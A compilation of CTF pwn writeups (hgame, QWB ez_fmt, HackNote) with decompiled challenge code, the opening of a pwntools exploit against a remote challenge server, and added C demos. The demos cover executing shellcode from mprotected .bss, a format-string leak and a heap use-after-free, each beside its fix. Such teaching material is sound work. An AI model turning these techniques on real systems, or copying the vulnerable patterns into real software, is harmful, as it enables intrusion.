hgame week2 pwn writeup
EldenRing 2: a simple UAF. Since I only started learning heap exploitation at the beginning of the winter break, this one is written up in a bit more detail. First, the pseudo-C:
```c
// local variable allocation has failed, the output may be wrong!
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [rsp+1Ch] [rbp-4h] BYREF

  init(argc, argv, envp);
  while ( 1 )
  {
    menu(*(_QWORD *)&argc);
    *(_QWORD *)&argc = "%d";
    __isoc99_scanf("%d", &v4);
    switch ( v4 )
    {
      case 1:
        add_note();
        ...
```
hgame week1 pwn writeup
ezsignIn: fast enough hands, straight to first blood.
elden ring: the black-screen loading is painful. The approach is roughly this: pivot the stack to the bss section, use mprotect to change the bss section's permissions, then write shellcode into bss and run it to do orw (open/read/write).
```python
from pwn import *
context(arch="amd64",log_level="debug")
#p=process("./vuln")
p=remote("47.100.137.175",32546)
one=0xe3afe
libc=ELF("./libc.so.6")
elf=context.binary=ELF("./vuln")
sleep(8)
#gdb.attach(p)
pop_rdi=0x00000000004013e3
main=0x401297
...
```
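The last two steps of the plan above (make bss executable with mprotect, then jump to shellcode placed there) can be tried out in isolation before wiring them into a ROP chain. The program below is an added example, not code from the writeup or the challenge: it copies a payload into a static `.bss` buffer, page-aligns the address for `mprotect`, flips the page to RWX and calls it. The payload is a constructed stand-in (`mov eax, 42 ; ret`) rather than an orw shellcode, so the effect is a visible return value instead of a file read; everything else (alignment, protection flags, the cast to a function pointer) is exactly what the real step needs. Linux x86-64 only.

```c
// Added example (not from the writeup): mprotect .bss, then execute shellcode from it.
// Linux x86-64 only; on other platforms run_shellcode_from_bss() returns -1.
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

// Zero-initialised static array: it lives in .bss, mapped read/write but not executable.
static unsigned char bss_buf[4096];

// Constructed stand-in for the orw payload:  mov eax, 42 ; ret
static const unsigned char stub_shellcode[] = { 0xb8, 0x2a, 0x00, 0x00, 0x00, 0xc3 };

int shellcode_supported(void) {
#if defined(__x86_64__) && defined(__linux__)
    return 1;
#else
    return 0;
#endif
}

// Copy the payload into .bss, make the pages containing it RWX, call it,
// and return whatever the payload returns (42 for the stub). -1 on failure.
int run_shellcode_from_bss(void) {
    if (!shellcode_supported()) return -1;

    memcpy(bss_buf, stub_shellcode, sizeof stub_shellcode);

    long page = sysconf(_SC_PAGESIZE);
    if (page <= 0) return -1;

    // mprotect requires a page-aligned start: round the buffer address down,
    // and cover every page the buffer touches.
    uintptr_t start = (uintptr_t)bss_buf & ~((uintptr_t)page - 1);
    uintptr_t end   = (uintptr_t)bss_buf + sizeof bss_buf;
    size_t len      = (size_t)(end - start);

    if (mprotect((void *)start, len, PROT_READ | PROT_WRITE | PROT_EXEC) != 0) {
        perror("mprotect");
        return -1;
    }

    // Same thing the ROP chain does after mprotect: jump into the buffer.
    int (*payload)(void) = (int (*)(void))bss_buf;
    int rc = payload();

    // Drop execute permission again once the payload has run.
    mprotect((void *)start, len, PROT_READ | PROT_WRITE);
    return rc;
}

int main(void) {
    printf("payload returned %d\n", run_shellcode_from_bss());
    return 0;
}
```

In the real exploit the three arguments to `mprotect` (page-aligned bss address, length, `7` for RWX) are loaded into rdi/rsi/rdx with gadgets and the return address after the call points at the shellcode; the alignment requirement is the same, and forgetting it makes `mprotect` fail with EINVAL.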
QWB (强网杯) ez_fmt reproduction
ez_fmt: I originally planned to brute-force the low bytes with the format string, but after reading other people's writeups there seems to be a more elegant approach. First, let's look at the challenge.
```c
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[88]; // [rsp+0h] [rbp-60h] BYREF
  unsigned __int64 v5; // [rsp+58h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 2, 0LL);
  printf("There is a gift for you %p\n", buf);
  read(0, buf, 0x30uLL);
  if ( w == 0xFFFF )
  {
    printf(buf);
    w = 0;
  }
  return 0;
}
```
The challenge logic is very simple: it gives you an address on the stack ...
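The bug the challenge hinges on is the `printf(buf)` call: user input becomes the format string, so `%p`-style conversions read whatever the calling convention hands to printf next (registers, then the stack), and positional conversions like `%7$lx` pick a specific slot. The code below is an added example, not the challenge's code or the writeup's solution: it reproduces the same bug with `snprintf` so the result can be inspected, puts the constant-format fix next to it, and shows a well-defined positional read of a value the program passed (the constructed marker `0x4141414141414141`) to illustrate how an attacker-chosen specifier selects what gets leaked.

```c
// Added example (not the challenge's code): uncontrolled format string, read side.
#include <stdio.h>
#include <string.h>

// Vulnerable: the user's bytes are the format string, like printf(buf) above.
// With no matching arguments, %p reads from wherever the varargs would be.
int format_vulnerable(const char *user, char *out, size_t n) {
    return snprintf(out, n, user);
}

// Fixed: the user's bytes are data; the format is a constant.
int format_safe(const char *user, char *out, size_t n) {
    return snprintf(out, n, "%s", user);
}

// 1 if the vulnerable path interpreted conversions (output differs from input).
int vulnerable_interprets(const char *user) {
    char out[256];
    format_vulnerable(user, out, sizeof out);
    return strcmp(out, user) != 0;
}

// 1 if the fixed path reproduced the input verbatim.
int safe_is_literal(const char *user) {
    char out[256];
    format_safe(user, out, sizeof out);
    return strcmp(out, user) == 0;
}

// Same bug, but the program actually passed one argument. A positional
// conversion in the attacker's string ("%1$lx") pulls that argument out;
// in a real target the index would instead point at a stack slot of interest.
// Constructed marker value, labelled as such.
#define MARKER 0x4141414141414141UL

int read_marker_with(const char *user_fmt, char *out, size_t n) {
    return snprintf(out, n, user_fmt, MARKER);
}

int positional_read_hits_marker(void) {
    char out[64];
    read_marker_with("%1$lx", out, sizeof out);
    return strcmp(out, "4141414141414141") == 0;
}

int main(void) {
    char out[256];
    format_vulnerable("%p.%p.%p.%p", out, sizeof out);
    printf("vulnerable: %s\n", out);
    format_safe("%p.%p.%p.%p", out, sizeof out);
    printf("fixed:      %s\n", out);
    read_marker_with("%1$lx", out, sizeof out);
    printf("positional: %s\n", out);
    return 0;
}
```

The write side (`%n`) is what turns this into a primitive for changing `w` or a return address; it is omitted here because the challenge gives the format string only a single shot, and because glibc built with `_FORTIFY_SOURCE` refuses `%n` in writable format strings, so a standalone demo would not run everywhere.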
HackNote
Hacknote: for people starting out with heap exploitation this is a good introductory challenge, but the pwnable.tw version has its symbol table stripped, which makes gdb debugging more troublesome; I recommend doing the version on 攻防世界 (adworld) first. Let's start with the code decompiled by IDA.
```c
void __cdecl __noreturn main()
{
  int v0; // eax
  char buf[4]; // [esp+8h] [ebp-10h] BYREF
  unsigned int v2; // [esp+Ch] [ebp-Ch]

  v2 = __readgsdword(0x14u);
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 2, 0);
  while ( 1 )
  {
    while ( 1 )
    {
      all_choice();
      read(0, buf, 4u);
      v0 = atoi(buf);
      ...
```
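Both EldenRing 2 and HackNote above are menu-driven note managers whose bug is a use-after-free: delete frees the chunk but leaves the pointer in the global table, so the next allocation of the same size hands the attacker a chunk that the stale entry still points at. The program below is an added example that serves both excerpts; it is not code from either challenge or writeup. It implements the minimal note table, the vulnerable delete beside the fixed one, and a scenario that checks whether the stale entry aliases the new note. It assumes a glibc-style allocator that recycles a just-freed chunk of the same size on the next malloc (tcache), which is what makes the aliasing deterministic.

```c
// Added example (not from either challenge): note-manager UAF and its fix.
// Assumes a glibc-style allocator (tcache LIFO reuse of same-size chunks).
#include <stdlib.h>
#include <string.h>

#define MAX_NOTES 8
#define NOTE_SIZE 0x20   // request size; glibc serves it from the 0x30 tcache bin

static char *notes[MAX_NOTES];

// Allocate into the first empty slot; returns the index or -1.
int add_note(const char *content) {
    for (int i = 0; i < MAX_NOTES; i++) {
        if (notes[i] == NULL) {
            notes[i] = malloc(NOTE_SIZE);
            if (notes[i] == NULL) return -1;
            strncpy(notes[i], content, NOTE_SIZE - 1);
            notes[i][NOTE_SIZE - 1] = '\0';
            return i;
        }
    }
    return -1;
}

// Vulnerable delete: the chunk is freed but notes[idx] keeps pointing at it.
void delete_note_vulnerable(int idx) {
    if (idx < 0 || idx >= MAX_NOTES || notes[idx] == NULL) return;
    free(notes[idx]);
}

// Fixed delete: clear the slot so it can never be shown or freed again.
void delete_note_fixed(int idx) {
    if (idx < 0 || idx >= MAX_NOTES || notes[idx] == NULL) return;
    free(notes[idx]);
    notes[idx] = NULL;
}

const char *show_note(int idx) {
    if (idx < 0 || idx >= MAX_NOTES) return NULL;
    return notes[idx];
}

// Scenario: add note A, delete it vulnerably, add note B of the same size.
// Returns 1 if the stale notes[A] now points at B's chunk and "shows" B's data.
int uaf_aliasing_demo(void) {
    memset(notes, 0, sizeof notes);
    int a = add_note("first");
    delete_note_vulnerable(a);          // notes[a] is now dangling
    int b = add_note("second");         // slot a still looks occupied, so b != a
    int aliased = (a != b) && (notes[a] == notes[b]) &&
                  strcmp(show_note(a), "second") == 0;   // read through the stale pointer
    free(notes[b]);                     // one free: both entries name the same chunk
    memset(notes, 0, sizeof notes);
    return aliased;
}

// Same scenario with the fixed delete: the slot is empty, nothing dangles.
int fixed_delete_demo(void) {
    memset(notes, 0, sizeof notes);
    int a = add_note("first");
    delete_note_fixed(a);
    int cleared = (notes[a] == NULL) && (show_note(a) == NULL);
    int b = add_note("second");         // reuses slot a: no second pointer to the chunk
    int ok = cleared && (b == a);
    delete_note_fixed(b);
    return ok;
}
```

In the real challenges the chunk that gets recycled is not a plain string buffer: whatever the attacker allocates next at that size (in HackNote's case, a note's content landing where a note struct used to be) is what the stale entry will be interpreted as when the program shows or deletes it, which is the whole primitive. The fix is the one-line `notes[idx] = NULL` plus refusing to operate on empty slots.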